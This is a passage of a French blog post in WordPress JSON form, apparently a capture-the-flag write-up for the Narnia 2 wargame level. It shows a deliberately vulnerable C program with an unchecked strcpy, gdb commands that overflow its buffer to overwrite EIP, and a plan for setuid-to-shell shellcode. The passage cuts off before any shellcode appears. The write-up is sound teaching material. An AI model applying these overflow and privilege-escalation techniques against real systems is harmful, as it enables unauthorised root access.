{"id":554,"date":"2023-03-06T09:52:31","date_gmt":"2023-03-06T08:52:31","guid":{"rendered":"https:\/\/mindshield.eu\/?p=554"},"modified":"2023-03-23T15:03:45","modified_gmt":"2023-03-23T14:03:45","slug":"narnia-2","status":"publish","type":"post","link":"https:\/\/mindshield.eu\/index.php\/2023\/03\/06\/narnia-2\/","title":{"rendered":"\ud83e\udd81Narnia 2"},"content":{"rendered":"\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t\t
\n\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

<\/p>\n

Comme \u00e0 l\u2019accoutum\u00e9e, nous nous retrouvons pour le 3\u00e8me challenge de cette s\u00e9rie Narnia.<\/p>\n

<\/p>\n

<\/p>\n

Nous allons d\u00e9couvrir un nouvel outil indispensable pour le challenge, mais aussi approfondir des connaissances vu au cours des pr\u00e9c\u00e9dents challenges.<\/span><\/p>\n

<\/p>\n

<\/p>\n

D\u00e9couverte<\/h2>\n

<\/p>\n

<\/p>\n

Voici le code source du programme narnia2 :<\/p>\n

<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t

\n\t\t\t\t\t\t
\n\t\t\t\t\t
\n\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t\t\t
\n\t\t\t
\n\t\t\t\t\n\t\t\t\t\t#include \r\n#include \r\n#include \r\n\r\nint main(int argc, char * argv[]){\r\n    char buf[128]; # Un buffer de 128 octets\r\n\r\n    if(argc == 1){\r\n        printf(\"Usage: %s argument\\n\", argv[0]);\r\n        exit(1);\r\n    }\r\n    strcpy(buf,argv[1]);\r\n    printf(\"%s\", buf);\r\n\r\n    return 0;\r\n}<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3fef89c elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"3fef89c\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-727cb4d\" data-id=\"727cb4d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a7119ca elementor-widget elementor-widget-text-editor\" data-id=\"a7119ca\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Ici le bug a exploit\u00e9 n\u2019est pas visible au premier coup d\u2019\u0153il.<\/p>\n<p>Il faut savoir que <code>strcpy<\/code> est une fonction <b>d\u00e9pr\u00e9ci\u00e9e<\/b> car elle est vuln\u00e9rable au Buffer overflow : elle n\u2019a pas la possibilit\u00e9 de <b>v\u00e9rifier la taille du buffer de destination.<\/b><\/p>\n<p>On peut donc injecter plus de caract\u00e8res que ce que peut recevoir la variable <code>buf<\/code> lors du <code>strcpy<\/code>.<\/p>\n<p>Pour analyser le fonctionnement plus en d\u00e9tail, j\u2019ai utilis\u00e9 <code>peda-gdb<\/code>. Il s\u2019agit d\u2019un d\u00e9buggeur permettant de d\u00e9sassembler un programme pour comprendre ce qu\u2019il s\u2019y passe.<\/p>\n<p>&nbsp;<\/p>\n<p>On le lance en tapant la commande :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-ce13aea elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"ce13aea\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-4aacf44\" data-id=\"4aacf44\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-33f8693 elementor-widget elementor-widget-code-highlight\" data-id=\"33f8693\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>peda<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-71fa758 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"71fa758\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-270c06c\" data-id=\"270c06c\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7e84193 elementor-widget elementor-widget-text-editor\" data-id=\"7e84193\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>On s\u00e9lectionne le fichier \u00e0 ex\u00e9cuter :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-2853294 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"2853294\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-feee455\" data-id=\"feee455\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-f087b3a elementor-widget elementor-widget-code-highlight\" data-id=\"f087b3a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>file \/narnia\/narnia2<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-aac2f3f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"aac2f3f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-409572f\" data-id=\"409572f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-e5dde30 elementor-widget elementor-widget-text-editor\" data-id=\"e5dde30\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>On configure les arguments que l\u2019on va injecter dans la fonction de cette mani\u00e8re :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-665e296 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"665e296\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-db6f38b\" data-id=\"db6f38b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a3f0851 elementor-widget elementor-widget-code-highlight\" data-id=\"a3f0851\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>pset arg '\"A\"*135'<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-20fc522 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"20fc522\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1fe2c8b\" data-id=\"1fe2c8b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-bec604e elementor-widget elementor-widget-text-editor\" data-id=\"bec604e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>On configure un breakpoint (sinon le programme va d\u00e9filer jusqu\u2019\u00e0 la fin et on ne pourra pas voir ce qu\u2019il se passe) :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-a21f54c elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"a21f54c\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-5fcd0c8\" data-id=\"5fcd0c8\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-91ad00f elementor-widget elementor-widget-code-highlight\" data-id=\"91ad00f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>break *main<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-517c8fe elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"517c8fe\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c6edc88\" data-id=\"c6edc88\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-d963ac2 elementor-widget elementor-widget-text-editor\" data-id=\"d963ac2\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Et enfin on d\u00e9marre le programme :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-959f514 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"959f514\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-0e66b88\" data-id=\"0e66b88\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-47451b1 elementor-widget elementor-widget-code-highlight\" data-id=\"47451b1\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>start<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-b1b11f5 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"b1b11f5\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-6477574\" data-id=\"6477574\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-0fb2657 elementor-widget elementor-widget-text-editor\" data-id=\"0fb2657\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Le programme va ensuite attendre que l\u2019on passe les instructions une \u00e0 une avec la touche <code>n\u00a0<\/code>puis Entr\u00e9e.<\/p>\n<p>\u00a0<\/p>\n<p>Sur l\u2019image ci-dessous, voici le r\u00e9sultat de ces op\u00e9rations :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-8e8b20c elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"8e8b20c\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f7a71ae\" data-id=\"f7a71ae\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-dfb5d57 elementor-widget elementor-widget-image\" data-id=\"dfb5d57\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"704\" height=\"566\" src=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/Untitled.png\" class=\"attachment-large size-large wp-image-559\" alt=\"\" srcset=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/Untitled.png 704w, https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/Untitled-300x241.png 300w\" sizes=\"(max-width: 704px) 100vw, 704px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-135c5e3 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"135c5e3\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-b519d72\" data-id=\"b519d72\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-654cb61 elementor-widget elementor-widget-text-editor\" data-id=\"654cb61\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Si c\u2019est la premi\u00e8re fois que vous utilisez un d\u00e9bugueur, ne paniquez pas !<\/p>\n<p>\u00a0<\/p>\n<p>L\u2019affichage peut paraitre impressionnant au d\u00e9but mais il est en fait assez intuitif :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-88282cc elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"88282cc\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-ef1c7c0\" data-id=\"ef1c7c0\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4485e80 elementor-widget elementor-widget-image\" data-id=\"4485e80\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"704\" height=\"566\" src=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/peda-1.png\" class=\"attachment-large size-large wp-image-558\" alt=\"\" srcset=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/peda-1.png 704w, https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/peda-1-300x241.png 300w\" sizes=\"(max-width: 704px) 100vw, 704px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-e7c504b elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"e7c504b\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c935584\" data-id=\"c935584\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-011237b elementor-widget elementor-widget-text-editor\" data-id=\"011237b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Par rapport au programme, nous en sommes \u00e0 l\u2019instruction <code>strcpy<\/code> (encadr\u00e9 en rouge).<\/p>\n<p>Sur la pile, on voit bien qu\u2019il y a des \u201c<strong>A<\/strong>\u201d r\u00e9p\u00e9t\u00e9s 135 fois (soit 7 de trop pour <code>buf<\/code>) (encadr\u00e9 en rouge).<\/p>\n<p><span style=\"font-size: 18px;color: var( --e-global-color-text );font-family: var( --e-global-typography-text-font-family ), Sans-serif;font-weight: var( --e-global-typography-text-font-weight )\">Je passe les instructions jusqu\u2019au <\/span><code style=\"font-size: 18px;color: var( --e-global-color-text );font-weight: var( --e-global-typography-text-font-weight )\">ret<\/code><span style=\"font-size: 18px;color: var( --e-global-color-text );font-family: var( --e-global-typography-text-font-family ), Sans-serif;font-weight: var( --e-global-typography-text-font-weight )\"> :<\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-cb43324 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"cb43324\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-417dc71\" data-id=\"417dc71\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-837ffc6 elementor-widget elementor-widget-image\" data-id=\"837ffc6\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"729\" height=\"435\" src=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/peda-2-1.png\" class=\"attachment-large size-large wp-image-557\" alt=\"\" srcset=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/peda-2-1.png 729w, https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/peda-2-1-300x179.png 300w\" sizes=\"(max-width: 729px) 100vw, 729px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-e64de12 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"e64de12\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2f94ba3\" data-id=\"2f94ba3\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-54392c9 elementor-widget elementor-widget-text-editor\" data-id=\"54392c9\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>On voit que la valeur de <strong>EIP<\/strong> a \u00e9t\u00e9 modifi\u00e9e. Alors qu\u2019elle est cens\u00e9e contenir l\u2019adresse m\u00e9moire de la prochaine instruction, elle contient d\u00e9sormais une chaine de 3 \u201c<strong>A<\/strong>\u201d.<\/p>\n<p>Ainsi, lors du <code>ret<\/code>, lorsque le programme va vouloir aller \u00e0 la prochaine instruction, il va se r\u00e9f\u00e9rer \u00e0 <strong>EIP<\/strong>. Or, la nouvelle adresse n\u2019est pas valide.<\/p>\n<p>C\u2019est cela qui cause le <code>Segmentation Fault<\/code>.<\/p>\n<p>Pour r\u00e9soudre ce challenge il va donc falloir prendre le contr\u00f4le d\u2019<strong>EIP<\/strong> pour lui faire ex\u00e9cuter notre propre code. C\u2019est le principe d\u2019une attaque <code>Stack over Flow<\/code>.<\/p>\n<p>Ainsi, pour r\u00e9soudre ce challenge, nous avons besoin d\u2019injecter :<\/p>\n<p>\u00a0<\/p>\n<ul>\n<li>Des caract\u00e8res permettant de remplir le buffer ;<\/li>\n<li>Un shellcode ;<\/li>\n<li>L\u2019adresse de retour qui correspondra \u00e0 l\u2019adresse du d\u00e9but du shellcode.<\/li>\n<\/ul>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-f8ef2b5 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"f8ef2b5\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1e4f676\" data-id=\"1e4f676\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-695cdf7 elementor-widget elementor-widget-heading\" data-id=\"695cdf7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h3 class=\"elementor-heading-title elementor-size-default\">Construction du shellcode<\/h3>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-d10ca7a elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"d10ca7a\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-b21ea41\" data-id=\"b21ea41\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-e4b94a5 elementor-widget elementor-widget-text-editor\" data-id=\"e4b94a5\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Dans un premier temps, comme vu dans l\u2019article pr\u00e9c\u00e9dent, pour construire un shellcode, il faut tout d\u2019abord cr\u00e9er un programme assembleur.<\/p><p>Le programme doit contenir :<\/p><p>\n\n<\/p><ol>\n<li>L\u2019ex\u00e9cution d\u2019une commande permettant d\u2019utiliser le <code>sticky bit<\/code> pour s\u2019\u00e9lever en privil\u00e8ges<\/li>\n<li>L\u2019ex\u00e9cution d\u2019une commande permettant d\u2019ex\u00e9cuter <code>\/bin\/sh<\/code><\/li>\n<\/ol>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-653a2c8 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"653a2c8\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-45d6a38\" data-id=\"45d6a38\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-b4931d3 elementor-widget elementor-widget-heading\" data-id=\"b4931d3\" data-element_type=\"widget\" data-e-type=\"widget\" 